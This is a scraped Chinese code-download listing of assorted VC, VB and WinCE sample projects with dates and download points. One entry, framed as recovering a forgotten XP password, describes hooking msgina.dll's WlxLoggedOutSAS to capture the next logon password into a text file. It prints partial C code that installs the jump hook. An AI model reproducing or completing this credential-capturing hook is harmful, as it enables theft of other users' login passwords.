-
VC下的Usb接口程序,VC++下的接口程序
VC下的Usb接口程序,VC++下的接口程序-VC usb
- 2022-02-04 06:35:16下载
- 积分:1
-
用VC编写的程序,憨豆的眼睛,很有趣的。看看吧
用VC编写的程序,憨豆的眼睛,很有趣的。看看吧-VC prepared by the procedure, like the bean eyes, very interesting. Let"s see it
- 2022-12-25 08:20:03下载
- 积分:1
-
Course design of a freshman,developed by VB,can run properly.
大一新生的课程设计~VB制作~完全按照规定制作可运行没有任何问题-Course design of a freshman,developed by VB,can run properly.
- 2023-02-28 13:45:02下载
- 积分:1
-
dbxoda control for using oracle with bcb6/7
dbxoda control for using oracle with bcb6/7
- 2022-01-23 10:52:59下载
- 积分:1
-
嵌入式WinCE实例创建过程,使用EVC实现发展
嵌入式WINCE创建进程的例子,使用EVC开发实现-Embedded WINCE example to create the process, the use of EVC realize development
- 2022-11-26 00:50:03下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
win2000 under the direct access to port 1, using install_giveio.bat, call loaddr...
win2000下直接访问端口
1、用install_giveio.bat,调用loaddrv.exe,安装giveio.sys 到系统中。
2、安装 port.pas后,在delphi的‘Custom‘面板中, 有一个port元件。
3、拖一个TPort到窗体上,命名为port。
4、那么就可以直接访问端口(2000下也可以),如:读 i:= port[$378] 写 port[$378]:=
5、status_giveio.sys 查看状态,remove_giveio.sys 反安装驱动。
6、tstio.exe 直接调用bios来发声,可以用来测试是否安装驱动成功。cygwin1.dll是loaddrv.exe 要调用的,因为它是用MinGw32下的gcc编译的。 -win2000 under the direct access to port 1, using install_giveio.bat, call loaddrv.exe, installed into the system giveio.sys. 2, installed after port.pas in delphi the
- 2022-07-16 02:09:50下载
- 积分:1
-
用C语言编写的模拟windows的打字软件,可以实现基本的打字功能!...
用C语言编写的模拟windows的打字软件,可以实现基本的打字功能!-Write with c to simulate windows typing software.This will implement those basic typing functions.
- 2023-01-03 12:15:05下载
- 积分:1
-
用于定时中断输出波形,可调整正弦波的频率和占空比。
用于定时中断输出波形,可调整正弦波的频率和占空比。-Interrupted from time to time for the output waveform, sine wave of adjustable frequency and duty cycle.
- 2022-02-06 08:44:34下载
- 积分:1
-
域名服务器的仿真程序:
一个简单的仿真模拟程序,其中包括数据的输入、查询和删除功能,要求在该程序的基础上添加一些功能,使程序的功能更为全面,操作更加方便。...
域名服务器的仿真程序:
一个简单的仿真模拟程序,其中包括数据的输入、查询和删除功能,要求在该程序的基础上添加一些功能,使程序的功能更为全面,操作更加方便。-Domain Name Server simulation procedures: a simple simulation program, including data entry, query and delete functions, the requirements in the program based on the add function, the function of the process more comprehensive, more convenient operation.
- 2023-02-05 07:25:03下载
- 积分:1